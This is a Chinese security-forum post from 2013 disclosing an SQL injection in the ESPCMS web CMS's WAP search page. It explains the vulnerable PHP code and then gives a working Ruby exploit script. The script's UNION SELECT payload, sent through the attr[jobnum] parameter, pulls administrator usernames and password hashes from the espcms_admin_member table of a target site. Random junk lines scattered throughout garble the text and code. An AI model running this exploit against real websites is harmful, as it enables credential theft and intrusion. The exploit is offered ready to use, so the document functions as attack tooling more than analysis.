中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
- U5 Z, t3 M' E, w1 Z# r2 u
0×2 PoC
5 j7 e, s' a0 d' ?
7 k( E; F% J( S, t# w a* I0 t
0 Y) C; o9 h0 c2 B
" H) ?! t9 g* K0 E
0×0 漏洞概述
1 a K4 G2 J; X' V
4 e1 H- y7 \6 B; K
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
. ~5 H7 Q) Y2 X
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
$ U1 h" [8 D' t; _. ]
! q$ ^$ M7 ^- M% ?3 B
: x. k8 t0 Z4 n0 r y! W( t8 v
0×1 漏洞细节
$ Q5 L* j( Z- e1 k. A% O/ R
9 O; y& ?7 y. ~4 U1 `0 f
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
0 {- N6 A1 I! q7 Z" p
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
% m7 ~8 L( r! D4 A5 Q8 N9 Q
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
$ b6 g$ y; u4 C$ \) t) F; J! g1 y
- ~6 \# r2 k* _5 U; h
在/interface/3gwap_search.php文件的in_result函数中:
1 i7 A0 L5 v9 i% l* |; g" R
' k" H: Y5 ~* X
0 Y6 D' Y" X! C
4 Y e- f" T" C; f) V5 M L# w1 i k2 l
function in_result() {
7 G' z/ T' i d/ O/ L2 j
... ... ... ... ... ... ... ... ...
0 e7 n' u- B$ ] u; Q3 f
$urlcode = $_SERVER[ 'QUERY_STRING '];
( ?3 i( a5 z! D- m* z
parse_str(html_entity_decode($urlcode), $output);
0 Z$ @% p, ~8 k, h* ^2 {
1 H3 i- S8 v% w5 I" ^3 ?
... ... ... ... ... ... ... ... ...
9 P+ [. Z, j t* r4 F! l
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
2 o' v7 l3 J9 c: W: y& ^$ Z
: N+ H, `8 ]7 t; P5 r5 c( [6 G
$db_table = db_prefix . 'model_att';
- r; h: q1 T; ]9 y1 o. I
3 ^6 j+ `, |* X9 I7 W# k; o6 j
foreach ($output['attr' ] as $key => $value) {
A4 {6 ]9 f0 T$ I3 @3 G7 ^
if ($value) {
0 w( I0 {+ o6 b/ B% i& H# F) S
' _3 B7 l6 N; s/ k# L, R/ b
$key = addslashes($key);
) t% ?0 `7 O3 F r7 S Z% z
$key = $this-> fun->inputcodetrim($key);
; [, Q9 g& J8 b
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
5 p" C6 _& l, ?: i% e
$countnum = $this->db_numrows($db_table, $db_att_where);
2 T" D' F3 D" b: s
if ($countnum > 0) {
# U9 h3 v) `2 S# S2 t
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
' j7 g7 ~8 Z7 b& g0 J5 D e
}
9 z9 W8 U! @" [
}
/ c3 |; i" L0 p2 i* B% x2 C; ?
}
2 W1 l' D& ?% t! G. t) t
}
& Z w0 ]3 D+ ?7 z" ^ f
if (!empty ($keyword) && empty($keyname)) {
, n4 W7 f& u. y8 @) U6 Z
$keyname = 'title';
0 }2 l0 V0 D- u) D1 t- H9 a" s, v
$db_where.= " AND a.title like '%$keyword%'" ;
6 B4 X' y; h; ?: C! b
} elseif (!empty ($keyword) && !empty($keyname)) {
6 c) A8 k- q% R9 O
$db_where.= " AND $keyname like '% $keyword%'";
4 r- p$ s* T' ^8 ~9 F
}
4 R4 P, ^/ H* ` E4 W. E; p9 O
$pagemax = 15;
4 h, {: r# p5 u+ r! H, J
: _5 n. r% B* r6 ]: P7 }
$pagesylte = 1;
; O* h. }; ^' m+ ]# T4 e) {" [
/ w' |/ d8 |1 z2 a* |0 T- `
if ($countnum > 0) {
& {9 Y+ Y! e. g. z. x
( j! ? E4 R3 v$ D: ~! g& ?# G6 m8 T
$numpage = ceil($countnum / $pagemax);
# I0 I$ E7 x2 l4 |) C
} else {
. T' ~) [# A: |! o+ [. G
$numpage = 1;
! e3 M4 C( y3 y, A8 l, C
}
& r" c% `( C8 b, f. K$ W
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
# p6 C5 P' ?( S6 b5 e( \* s
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
- n3 d$ U: x) V, I" H
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
0 a& }3 _+ H9 ]& L4 G0 J
... ... ... ... ... ... ... ... ...
2 H7 {- D( F2 [( x+ L
}
4 j+ V( k* z- I& b2 V) l$ q- _
1 O r9 s+ d" W( O9 b) X
% c0 I' H6 `2 f1 J% i* j0 E
0×2 PoC
$ \, B/ v# J e) ~4 O* a, \$ ~
, o5 c+ Z+ w# c6 G
. p% D1 B% v- S' O( ^1 l7 @8 {
4 M( A) U6 @2 X" B, j6 Z, s0 M! w
require "net/http"
) l0 C; }0 d/ e) v+ [
$ \5 D, }: f, |, T
def request(method, url)
. [/ G& b' d5 A0 T, o( }( P+ Y g
if method.eql?("get")
% |" m. ~7 l; }
uri = URI.parse(url)
+ |2 w8 l: d! n& D
http = Net::HTTP.new(uri.host, uri.port)
* j: @% n3 F7 E0 _# C3 ]0 E8 Z' [5 h
response = http.request(Net::HTTP::Get.new(uri.request_uri))
+ v/ d' V4 T v% i
return response
7 |0 w( O: x( m. T. n' \" |/ q
end
& l. S+ v; [7 U# d1 @
end
- ?+ Z& n7 Q m' I; g! B
' g" v, x" S, Q, t1 ?
doc =<<HERE
$ ?% M9 q& p! L# B5 q) ^
-------------------------------------------------------
% F. D8 L2 U0 \7 p/ {
Espcms Injection Exploit
' I4 C, |/ q6 r7 Z8 B( f9 T5 w
Author:ztz
' x `8 e- A5 |3 _+ j% w
Blog:
http://ztz.fuzzexp.org/
2 G- q) _1 `) n
-------------------------------------------------------
* Y3 Q( j0 Y' D# S! N- ]
( V2 W% I8 Y/ C4 V3 T& h4 Q9 s
HERE
( X! a; y# G- h: K H! F3 e% C6 i
& u3 _+ u+ s& _) S% l
usage =<<HERE
, X( v1 \3 J* s0 B0 h
Usage: ruby #{$0} host port path
f+ E1 s2 e1 U9 w4 G: h$ n) Q* G
example: ruby #{$0}
www.target.com
80 /
T: J+ K2 H/ S0 B( M
HERE
$ U) e# `; Z. s( c0 v& ]' H6 b% d1 `( Y
. G ?' l/ O8 |9 B' W( X) b+ t) a
puts doc
/ W: H, D- A) y
if ARGV.length < 3
, t' Z! j5 v" g$ P$ m/ J0 m
puts usage
2 M/ z; ?0 p# r1 H/ R
else
% `& F+ e b% z; k7 z9 k
$host = ARGV[0]
5 S* _% J ?+ t, F1 b
$port = ARGV[1]
/ b, Z" B& @+ c1 \( h' U" q
$path = ARGV[2]
# A$ s2 B9 U R( {
- i5 l0 y& { q \
puts "
send request..."
- }& K9 B# ^2 O* S9 ]2 H: Z
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
. \' R( o3 r6 Z; e4 V) l# t; ]
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
2 J4 i+ ~* S) K6 O% B/ c
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
6 b4 a C4 j( N4 n n
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
' E: b- c1 a" S8 D
response = request("get", url)
c* G, P1 v- W/ {' U. C; G2 u8 S
result = response.body.scan(/\w+&\w{32}/)
& j0 v/ e" P# `- d3 u, ^9 w
puts result
1 ?9 \; m+ x# A' L% f# Z
end
' O T" R! }, P
5 z3 [( |2 q2 Y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2